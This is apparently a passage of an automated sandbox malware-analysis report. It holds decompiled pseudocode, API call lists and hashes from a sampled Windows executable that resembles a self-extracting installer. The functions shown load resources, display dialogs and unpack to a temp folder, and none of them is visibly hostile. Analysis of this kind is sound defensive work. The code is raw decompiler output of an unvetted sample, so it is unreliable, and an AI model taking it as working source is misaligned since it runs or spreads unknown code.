                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E000C44B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x000c417d
                                                                                                                                                                                                        0x000c418f
                                                                                                                                                                                                        0x000c4193
                                                                                                                                                                                                        0x000c41b7
                                                                                                                                                                                                        0x000c41d3
                                                                                                                                                                                                        0x000c41e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c41e7
                                                                                                                                                                                                        0x000c41d5
                                                                                                                                                                                                        0x000c41d6
                                                                                                                                                                                                        0x000c41d8
                                                                                                                                                                                                        0x000c41d9
                                                                                                                                                                                                        0x000c41da
                                                                                                                                                                                                        0x000c41df
                                                                                                                                                                                                        0x000c41e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c41e1
                                                                                                                                                                                                        0x000c41b9
                                                                                                                                                                                                        0x000c41ba
                                                                                                                                                                                                        0x000c41bc
                                                                                                                                                                                                        0x000c41bd
                                                                                                                                                                                                        0x000c41be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c41be
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000C30B4), ref: 000C4189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000C30B4), ref: 000C41E7
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: c7cf111fd10822195fd2d5ab878bc82d7c3d4cadf38e99c6e9dc9d97ea964795
                                                                                                                                                                                                        • Instruction ID: fc5038ccda5e91eb49ea14d2067cd1c112bc01bd9c45b8704fb1413853753c12
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7cf111fd10822195fd2d5ab878bc82d7c3d4cadf38e99c6e9dc9d97ea964795
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4201ADB57002183BF32417658CA6FBF658EEBD6799F14402DBB46E11819A68CC0141B5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C7155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0xc8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xc8004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0xc8008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x000c715d
                                                                                                                                                                                                        0x000c7161
                                                                                                                                                                                                        0x000c7165
                                                                                                                                                                                                        0x000c7178
                                                                                                                                                                                                        0x000c7182
                                                                                                                                                                                                        0x000c718e
                                                                                                                                                                                                        0x000c7197
                                                                                                                                                                                                        0x000c71a0
                                                                                                                                                                                                        0x000c71b1
                                                                                                                                                                                                        0x000c71b8
                                                                                                                                                                                                        0x000c71c4
                                                                                                                                                                                                        0x000c71c7
                                                                                                                                                                                                        0x000c71cb
                                                                                                                                                                                                        0x000c71d5
                                                                                                                                                                                                        0x000c71da
                                                                                                                                                                                                        0x000c71da
                                                                                                                                                                                                        0x000c71dc
                                                                                                                                                                                                        0x000c71dc
                                                                                                                                                                                                        0x000c71e2
                                                                                                                                                                                                        0x000c71e5
                                                                                                                                                                                                        0x000c71ee

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000C7182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 000C7191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 000C719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 000C71A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 000C71B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: c6611cde17f80fc594a2ccf95bbf3df20aae8b3b300136bcd0aabda3a09ac779
                                                                                                                                                                                                        • Instruction ID: e1df537e95147315a233b3733f9e93fc79eac5130b73b93a5b17d95cb2e204ee
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6611cde17f80fc594a2ccf95bbf3df20aae8b3b300136bcd0aabda3a09ac779
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84113A71E01208DFDB50DFB8DA48E9EB7F4EF18314F654859E805E7210EB389A048F45
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E000C19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E000C43D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xc9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x000c19e0
                                                                                                                                                                                                        0x000c19e0
                                                                                                                                                                                                        0x000c19eb
                                                                                                                                                                                                        0x000c19f2
                                                                                                                                                                                                        0x000c19f9
                                                                                                                                                                                                        0x000c19fc
                                                                                                                                                                                                        0x000c1a01
                                                                                                                                                                                                        0x000c1a2a
                                                                                                                                                                                                        0x000c1a2e
                                                                                                                                                                                                        0x000c1a3e
                                                                                                                                                                                                        0x000c1a4f
                                                                                                                                                                                                        0x000c1a62
                                                                                                                                                                                                        0x000c1a6a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1a03
                                                                                                                                                                                                        0x000c1a06
                                                                                                                                                                                                        0x000c1a20
                                                                                                                                                                                                        0x000c1a20
                                                                                                                                                                                                        0x000c1a08
                                                                                                                                                                                                        0x000c1a08
                                                                                                                                                                                                        0x000c1a14
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1a16
                                                                                                                                                                                                        0x000c1a18
                                                                                                                                                                                                        0x000c1a70
                                                                                                                                                                                                        0x000c1a72
                                                                                                                                                                                                        0x000c1a72
                                                                                                                                                                                                        0x000c1a14
                                                                                                                                                                                                        0x000c1a06
                                                                                                                                                                                                        0x000c1a81

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 000C1A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C1A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 000C1A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 000C1A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 000C1A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: ddb11c4f8bb384c3813959aa4e7ec5e071922ce6c9df2569e55df2a7f387cd17
                                                                                                                                                                                                        • Instruction ID: 76e48f62e141d49b203657656f6bb2bfbb88f2aa4c93775fd594d24299e966bb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddb11c4f8bb384c3813959aa4e7ec5e071922ce6c9df2569e55df2a7f387cd17
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F11A13160110DAFEB10EF68DD08FEE77B8FF4A314F108158F91692192DA349E01CB96
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E000C1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0xc91e0; // 0x27a8eb8
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0xc91e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0xc8584; // 0x0
                                                                                                                                                                                                        					E000C44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0xc8584; // 0x0
                                                                                                                                                                                                        				E000C44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}















                                                                                                                                                                                                        0x000c47e8
                                                                                                                                                                                                        0x000c47f0
                                                                                                                                                                                                        0x000c47f4
                                                                                                                                                                                                        0x000c480f
                                                                                                                                                                                                        0x000c4811
                                                                                                                                                                                                        0x000c4814
                                                                                                                                                                                                        0x000c4814
                                                                                                                                                                                                        0x000c4816
                                                                                                                                                                                                        0x000c4817
                                                                                                                                                                                                        0x000c4829
                                                                                                                                                                                                        0x000c482b
                                                                                                                                                                                                        0x000c482f
                                                                                                                                                                                                        0x000c484f
                                                                                                                                                                                                        0x000c4852
                                                                                                                                                                                                        0x000c4855
                                                                                                                                                                                                        0x000c4855
                                                                                                                                                                                                        0x000c4857
                                                                                                                                                                                                        0x000c4858
                                                                                                                                                                                                        0x000c4860
                                                                                                                                                                                                        0x000c4865
                                                                                                                                                                                                        0x000c486a
                                                                                                                                                                                                        0x000c486f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4876
                                                                                                                                                                                                        0x000c4831
                                                                                                                                                                                                        0x000c4841
                                                                                                                                                                                                        0x000c4847
                                                                                                                                                                                                        0x000c480b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c480b
                                                                                                                                                                                                        0x000c47f6
                                                                                                                                                                                                        0x000c4806
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,000C4E6F), ref: 000C47EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 000C4823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 000C4847
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000C4851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-3647970563
                                                                                                                                                                                                        • Opcode ID: 6776185531d840b5af51d9cb5aca3b75fedc930714a7015f30cf3cd9da010167
                                                                                                                                                                                                        • Instruction ID: 2f3f92f85bbfa142b66e48e65f2ff3ad35719d019316cdd955ee193814854c8e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6776185531d840b5af51d9cb5aca3b75fedc930714a7015f30cf3cd9da010167
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E411C675604641AFE7659F249C28FBF3B9AFBC5350B14851DFD8297281DE39CC0A8760
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E000C6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0xc9a3c; // 0xc0000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E000C44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t24 = _a16;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x000c651f
                                                                                                                                                                                                        0x000c652a
                                                                                                                                                                                                        0x000c6534
                                                                                                                                                                                                        0x000c656b
                                                                                                                                                                                                        0x000c6577
                                                                                                                                                                                                        0x000c657c
                                                                                                                                                                                                        0x000c6536
                                                                                                                                                                                                        0x000c653e
                                                                                                                                                                                                        0x000c6542
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6544
                                                                                                                                                                                                        0x000c6547
                                                                                                                                                                                                        0x000c654c
                                                                                                                                                                                                        0x000c6549
                                                                                                                                                                                                        0x000c6549
                                                                                                                                                                                                        0x000c6549
                                                                                                                                                                                                        0x000c655e
                                                                                                                                                                                                        0x000c6560
                                                                                                                                                                                                        0x000c6569
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6569
                                                                                                                                                                                                        0x000c6542
                                                                                                                                                                                                        0x000c6587

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(000C0000,000007D6,00000005), ref: 000C652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(000C0000,00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000C6538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(000C0000,00000000,00000547,000C19E0,00000000), ref: 000C6557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000C6560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: e23c63c0a666e454c502658f2b8dea84ebd82614831a7653c3d669f63a947c0d
                                                                                                                                                                                                        • Instruction ID: 4b38bcff735cce188047bcc3abf3ce22049a18cde04c4f996442226f52c25d0c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e23c63c0a666e454c502658f2b8dea84ebd82614831a7653c3d669f63a947c0d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E01DB72600919BBDB205F599C48EBF76ACEB85765F140119FE1093150D776CD10C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C3680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x000c368c
                                                                                                                                                                                                        0x000c368f
                                                                                                                                                                                                        0x000c3691
                                                                                                                                                                                                        0x000c369f
                                                                                                                                                                                                        0x000c36a7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c36ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c36bc
                                                                                                                                                                                                        0x000c36bc
                                                                                                                                                                                                        0x000c36c0
                                                                                                                                                                                                        0x000c36cb
                                                                                                                                                                                                        0x000c36c2
                                                                                                                                                                                                        0x000c36c4
                                                                                                                                                                                                        0x000c36c4
                                                                                                                                                                                                        0x000c36da
                                                                                                                                                                                                        0x000c36e0
                                                                                                                                                                                                        0x000c36e6
                                                                                                                                                                                                        0x00000000
